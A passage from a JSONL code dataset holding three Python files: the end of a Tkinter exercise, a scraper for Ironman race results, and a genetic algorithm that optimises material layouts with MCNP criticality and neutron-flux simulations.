new_label.grid()\n\n# ----------------------------------------------------------------------\n# If this module is running at the top level (as opposed to being\n# imported by another module), then call the 'main' function.\n# ----------------------------------------------------------------------\nif __name__ == '__main__':\n main()\n","repo_name":"Goldabj/IntroToProgramming","sub_path":"Tkinter_ttk/src/m99.py","file_name":"m99.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"45884781954","text":"# import libraries\nimport urllib2\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport sys\n\n#Add new urls to list\n# be sure to add filters (AG and male)\n# then go to page 2 to get the correct url.\n# then do the same thing for all years wanted\n# then replace the p=2 with p={page_nr}\n##the reason the webpages are listed instead of iterating through is because dates change and not just locations\nurl_list = [\"http://www.ironman.com/triathlon/events/americas/ironman/texas/results.aspx?p={page_nr}&race=texas&rd=20180428&agegroup=30-34&sex=M&y=2018&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/texas/results.aspx?p={page_nr}&race=texas&rd=20170422&agegroup=30-34&sex=M&y=2017&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/texas/results.aspx?p={page_nr}&race=texas&rd=20160514&agegroup=30-34&sex=M&y=2016&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/texas/results.aspx?p={page_nr}&race=texas&rd=20150516&agegroup=30-34&sex=M&y=2015&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/texas/results.aspx?p={page_nr}&race=texas&rd=20140517&agegroup=30-34&sex=M&y=2014&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/wisconsin/results.aspx?p={page_nr}&race=wisconsin&rd=20160911&agegroup=30-34&sex=M&y=2016&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/wisconsin/results.aspx?p={page_nr}&race=wisconsin&rd=20170910&agegroup=30-34&sex=M&y=2017&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/wisconsin/results.aspx?p={page_nr}&race=wisconsin&rd=20150913&agegroup=30-34&sex=M&y=2015&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/wisconsin/results.aspx?p={page_nr}&race=wisconsin&rd=20140907&agegroup=30-34&sex=M&y=2014&ps=20#axzz5FMGvgHL2\"]\n\n\n\n\ndef get_table(url):\n page = urllib2.urlopen(url)\n soup = BeautifulSoup(page, 'lxml') #parse html\n table = soup.find_all('table')[0] #Grab the first table\n return table\n\ndef set_columns(table):\n\n n_columns = 0\n n_rows=0\n column_names = []\n\n # Find the number of rows and columns\n for row in table.find_all('tr'):\n # Determine the number of rows in the table\n td_tags = row.find_all('td')\n if len(td_tags) > 0:\n n_rows+=1\n if n_columns == 0:\n # Set the number of columns for our table\n n_columns = len(td_tags)\n\n # Handle column names if we find them\n th_tags = row.find_all('th')\n if len(th_tags) > 0 and len(column_names) == 0:\n for th in th_tags:\n column_names.append(th.get_text())\n\n # Error checking for Column Names\n if len(column_names) > 0 and len(column_names) != n_columns:\n raise Exception(\"The column titles do not match the number of columns\")\n\n columns = column_names if len(column_names) > 0 else range(0,n_columns)\n df = pd.DataFrame(columns=columns, index= range(0,n_rows))\n\n return df,columns\n\ndef get_row_count(table):\n n_rows=0\n # Find the number of rows and columns\n for row in table.find_all('tr'):\n # Determine the number of rows in the table\n td_tags = row.find_all('td')\n if len(td_tags) > 0:\n n_rows+=1\n return n_rows\n\ndef get_results(df,table):\n row_marker = 0\n for row in table.find_all('tr'):\n #print(row)\n column_marker = 0\n columns = row.find_all('td')\n for column in columns:\n df.iat[row_marker,column_marker] = column.get_text()\n column_marker += 1\n if len(columns) > 0:\n row_marker += 1\n return df\n\ndef merge_df(df1, df2):\n df_new = pd.concat([df1, df2], ignore_index=True)\n return df_new\n\n\n\nif __name__ == '__main__':\n im_start_page = \"http://www.ironman.com/triathlon/events/americas/ironman/world-championship/results.aspx\"\n\n initialize_web_page = im_start_page.format(page_nr=1)\n #initializing a starting table\n init_table = get_table(initialize_web_page)\n #set initial columns names\n init_df,col_names = set_columns(init_table)\n init_df = init_df[init_df.Name.notnull()]\n\n n=0\n while n < len(url_list):\n start_web_page = url_list[n].format(page_nr=1)\n #set initial table to get columns\n table = get_table(start_web_page)\n #set initial columns names\n im_orig_df,col_names = set_columns(table)\n\n #rowcount = get_row_count(table)\n im_orig_df = get_results(im_orig_df,table)\n\n #print(im_orig_df)\n\n for i in range(2,10):\n page_nr = i\n web_page = url_list[n].format(page_nr=page_nr) #get the webpage url with page number\n print(\"Processing {}\".format(web_page)) #print page for debug\n table = get_table(web_page) #get the first table on the webpage\n rowcount = get_row_count(table)\n #(re)initialize dataframe\n im_results_df = pd.DataFrame(index= range(0,rowcount), columns=col_names)\n im_results_df = get_results(im_results_df,table)\n\n im_orig_df = merge_df(im_results_df,im_orig_df)\n n += 1 #used to iterate through the list of webpages\n\n init_df = merge_df(im_orig_df,init_df)\n\n\n\n print(init_df)\n","repo_name":"npwise/IM-web-scrape","sub_path":"im_web_scrape.py","file_name":"im_web_scrape.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9555640560","text":"import os\nimport collections\nimport math\nimport random\nimport copy\nimport time\n\n\nimport Individual_v1 as individual\nimport MCNP_File_Handler\n#import CNN_Handler\n\nclass genetic_algorithm:\n def __init__(self, options_dict):\n self.mcnp_file_handler = MCNP_File_Handler.mcnp_file_handler()\n print(\"Initializing GA with:\", options_dict)\n self.options = options_dict\n ### List of current generation individuals\n self.individuals = []\n\n random.seed(self.options['python_random_number_seed'])\n\n self.generation = 0\n self.individual_count = 0\n ### Creating initial population\n for ind in range(self.options['number_of_individuals']):\n self.individuals.append(individual.individual(options_dict, self.generation, self.individual_count))\n self.individual_count += 1\n\n if self.options['remake_duplicate_children'] == True:\n self.all_individuals = copy.deepcopy(self.individuals)\n print(\"All individuals:\", self.all_individuals)\n ### Loading CNN if needed\n #if 'cnn' in self.options['solver']:\n # model_string = \"CNN_3d_11x11_fm_cad_4x4_kern_v2.hdf5\"\n # self.cnn_handler = CNN_Handler.CNN_handler(model_string)\n # self.cnn_input = []\n\n if self.options['include_pattern']:\n print(\"Including a pattern in initial population!\")\n for ind_count, pattern_to_include in enumerate(self.options['pattern_to_include']):\n self.individuals[ind_count].material_matrix = []\n for material in pattern_to_include:\n self.individuals[ind_count].material_matrix.append([material])\n self.individuals[ind_count].make_material_string_scale('%array%1')\n\n if self.options['enforce_material_count']:\n print(\"enforcing material\",self.options['enforce_material_number'],' count:', self.options['enforced_fuel_count_value'])\n for ind_count, ind in enumerate(self.individuals):\n ind.enforce_material_count(self.options['enforce_material_number'], self.options['enforced_fuel_count_value'])\n\n ### Creating output csv if needed\n if self.options['write_output_csv']:\n output_csv = open(self.options['output_filename'] + '.csv', 'w')\n ### Writing out options for this run\n for flag in self.options:\n output_csv.write(\"{},{}\\n\".format(flag, self.options[flag]))\n output_csv.write(\"%%%begin_data%%%\\n\")\n output_csv.write(self.create_header() +\"\\n\")\n output_csv.close()\n\n\n ### Running eigenvalue calcs if needed\n #if self.options['enforced_maximum_eigenvalue'] == True:\n # getattr(self, self.options['check_eigenvalue_function'])()\n\n ### Evaluating initial population, gen 0\n print(\"Evaluating initial population\")\n self.evaluate(self.options['fitness'])\n\n if self.options['use_non_dominated_sorting'] == True:\n self.parents_list = self.non_dominated_sorting()\n else:\n self.individuals.sort(key=lambda x: getattr(x, self.options['fitness_sort_by']), reverse=True)\n ### Pairing down individuals to be specified number\n self.individuals = self.individuals[:self.options['number_of_individuals']]\n\n\n ### Evaluating diversity of population\n if self.options['choose_parent_based_on_bitwise_diversity']:\n print(\"Evaluating diversity of parents\")\n self.evaluate_bitwise_diversity_of_parents()\n\n self.write_output_v2(self.parents_list)\n self.generation += 1\n\n ### Running GA algo\n for generation in range(self.options['number_of_generations']):\n print(\"Generation: \", self.generation)\n print(\"crossover\")\n list_of_children = self.crossover()\n print(\"mutating\")\n list_of_mutated_children = self.mutate(list_of_children)\n\n if self.options['remake_duplicate_children'] == True:\n list_of_mutated_children = self.remake_duplicate_children(list_of_mutated_children, self.all_individuals)\n self.all_individuals += list_of_mutated_children\n\n if self.options['enforce_material_count']:\n print(\"enforcing fuel count:\", self.options['enforced_fuel_count_value'])\n for ind_count, ind in enumerate(list_of_mutated_children):\n ind.enforce_material_count(self.options['enforce_material_number'], self.options['enforced_fuel_count_value'])\n\n print(\"evaluating children\")\n self.evaluate(self.options['fitness'], list_of_mutated_children)\n #for ind_count, ind_ in enumerate(list_of_mutated_children):\n # print(ind_count, ind_.ind_count, ind_.generation, ind_.representativity)\n #print(\"CHILDREN:::\")\n #for ind_count, ind_ in enumerate(list_of_mutated_children):\n #print(ind_count, ind_.ind_count, ind_.generation, ind_.representativity)\n\n ### Checking if any of the children have already been created/evaluated\n\n ### combining now evaluated children with previous list of individuals\n self.individuals = self.parents_list + list_of_mutated_children\n\n\n\n\n print(\"All individuals in this generation!\")\n for ind_count, ind_ in enumerate(self.individuals):\n print(ind_count, ind_.ind_count, ind_.generation, ind_.keff, ind_.representativity)\n\n print(\"write output\")\n if self.options['write_output_csv']:\n self.write_output_v2(self.parents_list)\n\n self.generation += 1\n\n if self.options['remake_duplicate_children'] == True:\n self.all_individuals += list_of_mutated_children\n\n #print(\"Printing all individuals!\")\n #for ind_ in self.all_individuals:\n #print(ind_.input_file_string, ind_.representativity)\n\n if self.options['output_all_individuals_at_end_of_calculation'] == True:\n output_csv = open(self.options['output_all_individuals_at_end_of_calculation_file_name'] + '.csv', 'w')\n for flag in self.options:\n output_csv.write(\"{},{}\\n\".format(flag, self.options[flag]))\n output_csv.close()\n print(self.options['output_all_individuals_at_end_of_calculation_file_name'])\n self.write_output_v2(list_of_individuals = self.all_individuals, output_file_name = self.options['output_all_individuals_at_end_of_calculation_file_name'])\n\n\n def apply_constraint(self, list_of_individuals, constraint_type):\n print(\"Applying constraint:\", constraint_type)\n meet_constraint = False\n ### Seperating constraint and options, etc.\n constraint_split = constraint_type.split(\"#\")\n\n constraint_type_ = constraint_split[0]\n constraint_run_location = constraint_split[1]\n constraint_options = constraint_split[2]\n\n if constraint_type_ == 'keff':\n if 'mcnp' in self.options['solver']:\n self.mcnp_keff_inputs = []\n self.mcnp_file_handler = MCNP_File_Handler.mcnp_file_handler()\n for individual in list_of_individuals:\n ### Building MCNP input file\n data_dictionary_ = individual.create_discrete_material_mcnp_dictionary(\n self.options['keywords_list'])\n ### Finding and adding the fuel location to geometry dictionary\n data_dictionary_['kcode_source_x'] = str(individual.find_fuel_location())\n ### Building MCNP input\n self.mcnp_file_handler.write_mcnp_input(\n template_file=self.options['mcnp_keff_template_file_string'],\n dictionary_of_replacements=data_dictionary_,\n input_file_str=individual.keff_input_file_string)\n ### Building MCNP input script for cluster\n self.mcnp_file_handler.build_mcnp_running_script(individual.keff_input_file_string)\n ### Running MCNP input\n self.mcnp_file_handler.run_mcnp_input(individual.keff_input_file_string)\n ### Adding input name to list, used to determine if the jobs have completed or not\n self.mcnp_keff_inputs.append(individual.keff_input_file_string)\n\n ### Waits on the jobs to be completed (looking for \"_done.dat\" files)\n self.wait_on_jobs('mcnp_keff')\n\n ### Grabs keff from the output files\n for ind in list_of_individuals:\n if self.options['fake_fitness_debug']:\n ind.keff = random.uniform(0.5, 1.5)\n else:\n ind.keff = self.mcnp_file_handler.get_keff(ind.keff_input_file_string)\n\n ### If that keff is above a set threshold, sets acceptable_eigenvalue to false. Else, sets it True.\n if float(ind.keff) >= self.options['enforced_maximum_eigenvalue']:\n print(\"keff, \", ind.keff, \"too high. Skipping source calculation\")\n ind.acceptable_eigenvalue = False\n else:\n ind.acceptable_eigenvalue = True\n #if 'scale' in self.options['solver']:\n ### create scale inputs, add filenames to list\n #for individual in self.individuals:\n #if individual.evaluated_keff == False:\n #if self.options['geometry'] == 'cyl':\n # individual.make_material_string_scale('cyl_materials')\n #elif self.options['geometry'] == 'grid':\n # individual.make_material_string_scale('%array%1')\n #else:\n # print(\"Geometry not handled in evaluate function\")\n # exit()\n #scale_inputs.append(individual.setup_scale(self.generation))\n #individual.evaluated_keff = True\n #if self.options['fake_fitness_debug']:\n # individual.keff = random.uniform(0.5, 1.5)\n #self.scale_inputs = scale_inputs\n ### submitting all jobs and waiting on all jobs\n #if self.options['solver_location'] == 'necluster':\n # self.submit_jobs(self.scale_inputs)\n # self.wait_on_jobs('scale')\n\n #if self.options['solver_location'] == 'local':\n # print(\"Cant run scale locally... yet... fix this\")\n # exit()\n\n #for individual in self.individuals:\n # individual.get_scale_keff()\n ### If \"default_sort\" in constraint definition, sorting individuals by\n if \"default_sort\" in constraint_type:\n list_of_individuals.sort(key=lambda x: x.keff, reverse=False)\n return list_of_individuals\n\n def non_dominated_sorting(self):\n ###\n front = [[]]\n for individual in self.individuals:\n individual.front_rank = 'none'\n print(\"Nondominated sorting\", individual.input_file_string, individual.keff, individual.representativity)\n ### Initializing lists\n dominated_list = []\n number_of_inds_that_dominate_individual = 0\n #for fitness_ in self.options['fitness']:\n #dominated_list.append([])\n #number_of_inds_that_dominate_individual.append(0)\n\n ### Iterating over all individuals, comparing fitnesses\n for individual_ in self.individuals:\n if individual == individual_:\n continue\n individual_.front_number = 0\n\n if self.check_domination(individual, individual_):\n if individual_ not in dominated_list:\n dominated_list.append(individual_)\n\n elif self.check_domination(individual_, individual):\n number_of_inds_that_dominate_individual += 1\n\n\n individual.dominated_list = dominated_list\n individual.number_of_inds_that_dominate_individual = number_of_inds_that_dominate_individual\n #print(individual.input_file_string, individual.keff, individual.representativity, len(individual.dominated_list), individual.number_of_inds_that_dominate_individual)\n\n #for fitness_index, fitness_ in enumerate(self.options['fitness']):\n if individual.number_of_inds_that_dominate_individual == 0:\n individual.front_rank = 0\n #print(\"Ind is rank one:\", individual.input_file_string, individual.representativity, individual.keff)\n front[0].append(individual)\n ### Front counter\n\n\n pareto_front = 0\n while front[pareto_front] != []:\n current_front = []\n for individual in front[pareto_front]:\n #print(individual.input_file_string, \"dominates:\")\n for individual_ in individual.dominated_list:\n if individual_.input_file_string == individual.input_file_string:\n continue\n #print(individual_.input_file_string, individual_.number_of_inds_that_dominate_individual)\n individual_.number_of_inds_that_dominate_individual -= 1\n #print(individual_.input_file_string, individual_.number_of_inds_that_dominate_individual)\n if individual_.number_of_inds_that_dominate_individual == 0:\n\n if individual_.front_rank == 'none':\n individual_.front_rank = pareto_front + 1\n current_front.append(individual_)\n #print(individual_.input_file_string, individual_.front_rank, current_front)\n\n front.append(current_front)\n pareto_front += 1\n #print(\"Pareto fronts:\")\n #for front_count, front_list in enumerate(front):\n #print(front_list)\n #for ind in front_list:\n #print(front_count, ind.representativity, ind.keff)\n self.pareto_front = front\n\n #for individual_ in self.individuals:\n #print(individual_.input_file_string, individual_.representativity, individual_.keff)\n\n\n ### Building list of parents\n parents_list = []\n for front in self.pareto_front:\n if front == []:\n continue\n #print(\"Front:\", len(front))\n if len(front) < (self.options['number_of_parents'] - len(parents_list)):\n #print(\"Length of parent list!!!\", len(parents_list))\n parents_list = parents_list + front\n #print(\"Length of parent list!!!\", len(parents_list))\n else:\n\n front = self.crowding_distance(front)\n #print(len(front), self.options['number_of_parents'], len(parents_list))\n front.sort(key=lambda x: x.crowding_distance, reverse=True)\n\n ind_count = 0\n #print(\"Adding parents to parents list\")\n while self.options['number_of_parents'] != len(parents_list):\n parents_list.append(front[ind_count])\n ind_count += 1\n #print(\"parent_list len, etc\", len(parents_list), self.options['number_of_parents'])\n #for parent in parents_list:\n #print(parent.input_file_string, parent.keff, parent.representativity, parent.crowding_distance)\n return parents_list\n\n def crowding_distance(self, front):\n if front == []:\n return\n\n for ind in front:\n ind.crowding_distance = 0.0\n\n for fitness in self.options['fitness']:\n #print(\"fitness\",fitness)\n if len(front) == 0:\n continue\n if \"#\" in fitness:\n fitness = fitness.split(\"#\")\n fitness = fitness[0]\n ### Setting highest and lowest ind's to have large crowding distance\n front.sort(key=lambda x: getattr(x, fitness), reverse=True)\n front[0].crowding_distance = 99999999999999999.0\n front[-1].crowding_distance = 99999999999999999.0\n max_value = float(getattr(front[0],fitness))\n min_value = float(getattr(front[-1], fitness))\n diff_max_min = max_value - min_value\n ### Adding crowding distance for this fitness\n for count, ind in enumerate(front):\n\n if count == 0:\n continue\n if count == (len(front) - 1):\n continue\n\n ind_n_plus_one = float(getattr(front[count-1],fitness))\n ind_n_minus_one = float(getattr(front[count+1],fitness))\n try:\n ind.crowding_distance = ind.crowding_distance + (ind_n_plus_one - ind_n_minus_one)/(diff_max_min)\n except:\n continue\n #print(\"CROWDING DISTANCE!!!\", ind.crowding_distance, count, len(front))\n\n return front\n\n### Checks if ind_1 dominates ind_2\n def check_domination(self, ind_1, ind_2):\n for fit_count, fitness_ in enumerate(self.options['fitness']):\n if \"#\" in fitness_:\n fitness_ = fitness_.split(\"#\")\n fitness_ = fitness_[0]\n\n ind_value = getattr(ind_1, fitness_)\n comparison_value = getattr(ind_2, fitness_)\n\n if float(ind_value) >= float(comparison_value):\n continue\n else:\n return False\n\n return True\n\n def remake_duplicate_children(self, list_of_children, comparison_list):\n\n for child in list_of_children:\n #print(\"Checking child:\", child.material_matrix, comparison_list)\n for comparison_ind in comparison_list:\n #print(\"comparison\", child.material_matrix, comparison_ind.material_matrix)\n comparison_score = 0\n for child_mat, comp_mat in zip(child.material_matrix, comparison_ind.material_matrix):\n if child_mat == comp_mat:\n comparison_score += 1\n if comparison_score == self.options['total_materials']:\n #print(\"Duplicate child found! Forcing mutation\")\n #print(\"Before\", child.material_matrix)\n child.material_matrix = self.single_bit_mutation(child.material_matrix, force_mutation=True, force_mutation_per_material_sublist=2)\n #print(\"After\", child.material_matrix)\n #print(child.material_matrix, comparison_ind.material_matrix)\n #if child.material_matrix == comparison_ind.material_matrix:\n # child.create_random_pattern()\n return list_of_children\n\n def evaluate_bitwise_diversity_of_parents(self):\n\n temp_material_master_list = []\n for individual_count, individual in enumerate(self.individuals):\n if individual_count > self.options['number_of_parents'] - 1:\n individual.total_diversity_score = \"N/A\"\n continue\n\n individual.bitwise_diversity_scores = []\n ### cycling over parents evaluating the diversity, if a score of [total number of material locations] is given\n ### if the individuals are exactly the same, 0 exactly opposite\n\n for comparison_count, comparison_individual in enumerate(self.individuals):\n if comparison_count == individual_count:\n continue\n if comparison_count > self.options['number_of_parents'] - 1:\n continue\n individual.bitwise_diversity_scores.append([comparison_count,\n self.evaluate_bitwise_diversity(individual,\n comparison_individual)])\n\n ### Calculating total diversity score\n # print(\"Calculating total diversity score\")\n total_diversity_score = 0\n for d_s in individual.bitwise_diversity_scores:\n # print(d_s[1])\n total_diversity_score += d_s[1]\n\n individual.total_diversity_score = total_diversity_score\n # print(individual.total_diversity_score)\n\n def evaluate_bitwise_diversity(self, individual, comparison_individual):\n score = self.options['total_materials']\n for material_list_count, material_list in enumerate(individual.material_matrix):\n for material_count, material in enumerate(material_list):\n individual_material = individual.material_matrix[material_list_count][material_count]\n comparison_material = comparison_individual.material_matrix[material_list_count][material_count]\n\n if individual_material == comparison_material:\n score -= 1\n return score\n\n def choose_parent_based_on_bitwise_diversity(self, parent_1_value):\n diversity_scores = self.individuals[parent_1_value].bitwise_diversity_scores\n\n ### Sorting diversity scores\n diversity_scores.sort(key=lambda x: x[1], reverse=True)\n\n ### Setting the parent_2 default value to the most similar case\n parent_2_index = diversity_scores[self.options['number_of_parents'] - 2][0]\n\n for d_s in diversity_scores:\n random_value = random.uniform(0, 1)\n\n try:\n if random_value < (d_s[1] / self.individuals[parent_1_value].total_diversity_score):\n parent_2_index = d_s[0]\n except:\n parent_2_index = d_s[0]\n return parent_2_index\n\n\n return parent_2_index\n\n def evaluate(self, evaluation_types, list_of_individuals = \"Default\"):\n if list_of_individuals == \"Default\":\n list_of_individuals = self.individuals\n\n ### Updating list of individuals based on whether they meet the constraints in the constraint options\n for constraint in self.options['constraint']:\n if 'evaluate' in constraint:\n list_of_individuals = self.apply_constraint(list_of_individuals, constraint)\n\n for evaluation_type in evaluation_types:\n if \"#\" in evaluation_type:\n evaluation_type, evaluation_options = evaluation_type.split(\"#\")\n scale_inputs = []\n if evaluation_type == 'representativity':\n print(\"Evaluating Representativity\")\n if 'mcnp' in self.options['solver']:\n self.mcnp_inputs = []\n for individual in list_of_individuals:\n if individual.ran_source_calculation == False:\n if individual.acceptable_eigenvalue == True:\n ### Building MCNP input file\n self.build_mcnp_source_input(individual)\n individual.ran_source_calculations = True\n self.wait_on_jobs('mcnp')\n\n for individual in list_of_individuals:\n if self.options['fake_fitness_debug'] == True:\n individual.representativity = random.uniform(0, 1.0)\n individual.total_flux = random.uniform(0, 1.0)\n else:\n if individual.acceptable_eigenvalue == True:\n individual.flux_values, individual.flux_uncertainty, individual.total_flux, individual.total_flux_unc = self.mcnp_file_handler.get_flux(individual.input_file_string + \"o\")\n individual.representativity = self.mcnp_file_handler.calculate_representativity(individual.flux_values, individual.flux_uncertainty)\n if individual.acceptable_eigenvalue == False:\n individual.representativity = 0.0\n individual.total_flux = 0.0\n\n print(\"individual.representativity\", individual.representativity)\n\n\n\n #if 'cnn' in self.options['solver']:\n # print(\"solving for k with cnn\")\n # self.create_cnn_input()\n # self.solve_for_keff_with_cnn()\n return list_of_individuals\n #def create_cnn_input(self):\n # data_array = self.cnn_handler.build_individuals_array(self.individuals, generation=self.generation)\n\n # self.cnn_input = self.cnn_handler.build_input_data_reshaped(data_array,\n # X_val=11,\n # Y_val=11,\n # Z_val=1,\n # channels=2)\n # print(\"HERE!!! create_cnn_input\")\n\n #def solve_for_keff_with_cnn(self):\n # self.cnn_predictions = self.cnn_handler.model.predict(self.cnn_input)\n # # print(\"PREDICTIONSSSSS\", self.cnn_predictions, len(self.cnn_input))\n # for pred_count, prediction in enumerate(self.cnn_predictions):\n # # print(\"PREDICTION\", prediction)\n\n # self.individuals[pred_count].keff = prediction[0]\n\n ### The crossover function creates total population - number of parents\n def crossover(self):\n\n if self.options['use_non_dominated_sorting'] == True:\n self.parents_list = self.non_dominated_sorting()\n else:\n self.individuals.sort(key=lambda x: getattr(x, self.options['fitness_sort_by']), reverse=True)\n ### Pairing down individuals to be specified number\n self.individuals = self.individuals[:self.options['number_of_individuals']]\n self.parents_list = self.individuals[:10]\n\n ### Evaluating diversity of population\n if self.options['choose_parent_based_on_bitwise_diversity']:\n #print(\"Evaluating diversity of parents\")\n self.evaluate_bitwise_diversity_of_parents()\n\n number_of_children = self.options['number_of_individuals'] - \\\n self.options['number_of_parents']\n list_of_children = []\n for new_child_value in range(number_of_children):\n ### Getting parent values\n parent_1 = random.randint(0, self.options['number_of_parents'] - 1)\n parent_2 = random.randint(0, self.options['number_of_parents'] - 1)\n while parent_1 == parent_2:\n parent_2 = random.randint(0, self.options['number_of_parents'] - 1)\n\n if self.options['choose_parent_based_on_bitwise_diversity']:\n # print(\"Choosing parent 2 based on diversity score\")\n parent_2 = self.choose_parent_based_on_bitwise_diversity(parent_1)\n\n parent_1 = self.parents_list[parent_1]\n parent_2 = self.parents_list[parent_2]\n if self.options['crossover_type'] == 'bitwise':\n new_child_ind = self.bitwise_crossover(parent_1, parent_2)\n\n ### Checking if new child meets fuel # requirement\n if self.options['verify_fuel_mass_after_crossover']:\n fuel_count = new_child_ind.count_material(1)\n while ((fuel_count > self.options['maximum_fuel_elements']) or (\n fuel_count < self.options['minimum_fuel_elements'])):\n new_child_ind = self.bitwise_crossover(parent_1, parent_2)\n fuel_count = new_child_ind.count_material(1)\n\n if self.options['crossover_type'] == 'singlepoint':\n new_child_ind = self.singlepoint_crossover(parent_1, parent_2)\n if self.options['verify_fuel_mass_after_crossover']:\n ### Checking if new child meets fuel # requirement\n fuel_count = new_child_ind.count_material(1)\n while ((fuel_count > self.options['maximum_fuel_elements']) or (\n fuel_count < self.options['minimum_fuel_elements'])):\n new_child_ind = self.singlepoint_crossover(parent_1, parent_2)\n fuel_count = new_child_ind.count_material(1)\n\n try:\n new_child_ind.parent_string = parent_1.scale_input_filename + \",\" + parent_2.scale_input_filename\n except:\n new_child_ind.parent_string = str(parent_1.ind_count) + \",\" + str(parent_2.ind_count)\n\n new_child_ind.born_from_crossover = True\n\n list_of_children.append(new_child_ind)\n\n return list_of_children\n\n def build_mcnp_source_input(self, individual_):\n ### Building MCNP input file\n self.mcnp_file_handler.write_mcnp_input(template_file=self.options['mcnp_template_file_string'],\n dictionary_of_replacements=individual_.create_discrete_material_mcnp_dictionary(\n self.options['keywords_list']),\n input_file_str=individual_.input_file_string)\n self.mcnp_file_handler.build_mcnp_running_script(individual_.input_file_string)\n\n self.mcnp_file_handler.run_mcnp_input(individual_.input_file_string)\n self.mcnp_inputs.append(individual_.input_file_string)\n return\n\n def bitwise_crossover(self, parent_1, parent_2):\n child_ind = individual.individual(self.options, self.generation, self.individual_count)\n self.individual_count += 1\n # print(\"parent 1 pattern:\", parent_1.material_matrix)\n # print(\"parent 2 pattern:\", parent_2.material_matrix)\n # print(\"Child pattern before:\", child_ind.material_matrix, child_ind.ind_count)\n temp_material_master_list = []\n for material_list_count, material_list in enumerate(parent_1.material_matrix):\n temp_material_list = []\n for material_count, material in enumerate(material_list):\n selection = random.randint(0, 1)\n\n material = parent_1.material_matrix[material_list_count][material_count]\n\n if selection == 1:\n material = parent_2.material_matrix[material_list_count][material_count]\n\n temp_material_list.append(material)\n temp_material_master_list.append(temp_material_list)\n child_ind.material_matrix = temp_material_master_list\n # print(\"Child pattern after:\", child_ind.material_matrix)\n return child_ind\n\n def singlepoint_crossover(self, parent_1, parent_2):\n child_ind = individual.individual(self.options, self.generation)\n\n temp_material_master_list = []\n for material_list_count, material_list in enumerate(child_ind.material_matrix):\n temp_material_list = []\n\n ml_length = len(material_list) - 1\n\n singlepoint_value = random.randint(1, ml_length)\n\n temp_material_list = parent_1.material_matrix[material_list_count][0:singlepoint_value] + \\\n parent_2.material_matrix[material_list_count][singlepoint_value - 1:ml_length]\n\n temp_material_master_list.append(temp_material_list)\n child_ind.material_matrix = temp_material_master_list\n\n return child_ind\n\n def mutate(self, list_of_individuals):\n ### Currently only works on a material-basis\n #print(\"MUTATING!!!\")\n if self.options['mutation_type'] == 'bitwise':\n #print(\"BITWISE!\", len(list_of_individuals))\n for ind_count, individual in enumerate(list_of_individuals):\n #print(\"MUTATING:\", ind_count)\n original_material_matrix = copy.deepcopy(individual.material_matrix)\n individual.material_matrix = self.single_bit_mutation(original_material_matrix)\n\n if self.options['verify_fuel_mass_after_mutation']:\n ### Checking if new child meets fuel # requirement\n fuel_count = individual.count_material(1)\n # try_count = 0\n while ((fuel_count > self.options['maximum_fuel_elements']) or (\n fuel_count < self.options['minimum_fuel_elements'])):\n individual.material_matrix = self.single_bit_mutation(original_material_matrix)\n fuel_count = individual.count_material(1)\n # print(\"mutation fuel count:\", fuel_count)\n # try_count += 1\n # print(\"fixed mutation in:\", try_count, \"tries\")\n\n return list_of_individuals\n\n def single_bit_mutation(self, material_matrix, force_mutation = False, force_mutation_per_material_sublist = 1):\n new_material_matrix = []\n #print(\"old material matrix:\", material_matrix)\n ### If forcing a certain number of mutations per material sublist:\n force_mutation_index = []\n if force_mutation:\n for _ in range(force_mutation_per_material_sublist):\n rand_val = random.randint(0, len(material_matrix) - 1)\n while rand_val in force_mutation_index:\n rand_val = random.randint(0, len(material_matrix) - 1)\n #print(rand_val, force_mutation_index)\n force_mutation_index.append(rand_val)\n #print(\"FORCING A MUTATION! at index(es):\", force_mutation_index)\n\n for material_list in material_matrix:\n material_matrix_sublist = []\n\n\n\n for material_count, material in enumerate(material_list):\n ### Attempting mutation\n random_val = random.uniform(0, 1.0)\n\n ### If the current material count is in the force mutation list, forcing the mutation\n if force_mutation:\n if material_count in force_mutation_index:\n random_val = self.options['mutation_rate']\n #print(\"Forcing a mutation in material:\", material_count)\n\n\n if random_val <= self.options['mutation_rate']:\n\n new_index = random.randint(0, len(self.options['material_types']) - 1)\n while material == self.options['material_types'][new_index]:\n new_index = random.randint(0, len(self.options['material_types']) - 1)\n # print(\"NEW_INDEX: \", new_index, len(self.options['material_types']) - 1)\n # print(\"new material: \", self.options['material_types'][new_index], \"old\", material)\n material = self.options['material_types'][new_index]\n material_matrix_sublist.append(material)\n new_material_matrix.append(material_matrix_sublist)\n print(\"new_material_matrix:\", new_material_matrix)\n\n return new_material_matrix\n\n def submit_jobs(self, job_list):\n for job in job_list:\n print(\"Submitting job:\", job)\n os.system('qsub ' + job)\n\n def wait_on_jobs(self, run_type, unique_flag = \"\"):\n waiting_on_jobs = True\n jobs_completed = 0\n total_time = 0\n jobs_to_be_waited_on = getattr(self, run_type + \"_inputs\")\n temp_file_list = copy.deepcopy(jobs_to_be_waited_on)\n print(\"Jobs waiting on: \", jobs_to_be_waited_on)\n while waiting_on_jobs:\n for file in os.listdir():\n if \"gen_\" + str(self.generation) in file:\n if \"_done.dat\" in file:\n if unique_flag in file:\n file_temp = file.split(\"_done.dat\")\n script_str = file_temp[0]\n if script_str in temp_file_list:\n temp_file_list.remove(file_temp[0])\n jobs_completed += 1\n if jobs_completed == len(jobs_to_be_waited_on):\n print(\"All jobs are complete, continuing\")\n return\n\n print(\"Jobs Complete: \", jobs_completed, \"Jobs pending:\", len(jobs_to_be_waited_on) - jobs_completed)\n for file in temp_file_list:\n print(file)\n if self.options['skip_waiting_on_jobs_debug']:\n print(\"\"\"options['skip_waiting_on_jobs_debug'] is True, 